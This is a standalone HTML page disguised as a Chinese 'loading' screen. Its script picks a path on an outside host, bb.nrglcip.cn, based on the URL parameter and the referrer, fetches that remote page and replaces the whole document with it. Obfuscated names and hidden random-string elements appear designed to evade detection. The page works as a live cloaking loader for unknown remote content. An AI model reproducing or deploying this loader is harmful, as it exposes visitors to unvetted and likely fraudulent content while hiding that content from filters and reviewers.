<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .UjsgNe {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .UjsgNe .IkYQh55fj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .UjsgNe .content {
            line-height: 50px;
            text-align: center
        }

        .UjsgNe .img {
            width: 100%
        }

        .UjsgNe .jupNDeKRG {
            text-align: center
        }

        .UjsgNe .jupNDeKRG span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .UjsgNe .jupNDeKRG span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .UjsgNe .jupNDeKRG span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .UjsgNe .jupNDeKRG span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .UjsgNe .jupNDeKRG span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .UjsgNe .jupNDeKRG span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .UjsgNe .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function aiiq85MDX(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Lhfjb = aiiq85MDX('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Lhfjb +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Lhfjb +".html?a=share";
		}
		
        tHwUnXwaow=url+"#"+new Date().getTime();
        tHwUnXwaow && function() {
            $.get(tHwUnXwaow, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >ZvVU1hmt2VpEBAEbpJBAlO2cCxpcBWCTri32fBpJHtnjZOwrc59ZK2pRx1JGrBglHzr81CKx7UplEQypEDpchcJpr1yLZb5</ul>
<ul style='display:none' >ZvVU1hmt2VpEBAEbpJBAlO2cCxpcBWCTri32fBpJHtnjZOwrc59ZK2pRx1JGrBglHzr81CKx7UplEQypEDpchcJpr1yLZb5</ul>
<li style='display:none' >pQQmVNSJ2ovjtfDhM7nZM5tCA2ApKXpRMVHpD0G9dKskjGOTtT4nOKjdTaro4df0BCcrroyUdgnr8ykQ5iarP23ztvzzezliXVXHL</li><div class="UjsgNe">
    <div class="IkYQh55fj">
        <div class="jupNDeKRG">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>ZPkIGpQ8tsX5Ydxv3LqNHmm5fHqumRPT2IBZ1GqemR</a>
<p  style='display:none'>xwybPSZpqSpzS</p>
<div style='display:none'>XqvtYN6aicMW8HX43D</div>
<li style='display:none' >Rxkd9mG24lbvAIzS1bP9LIMy9Y1ydMFtfwyn3b</li>
<div style='display:none'>XqvtYN6aicMW8HX43D</div>
<div style='display:none'>XqvtYN6aicMW8HX43D</div>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<img  src='' style='display:none'></body>
</html>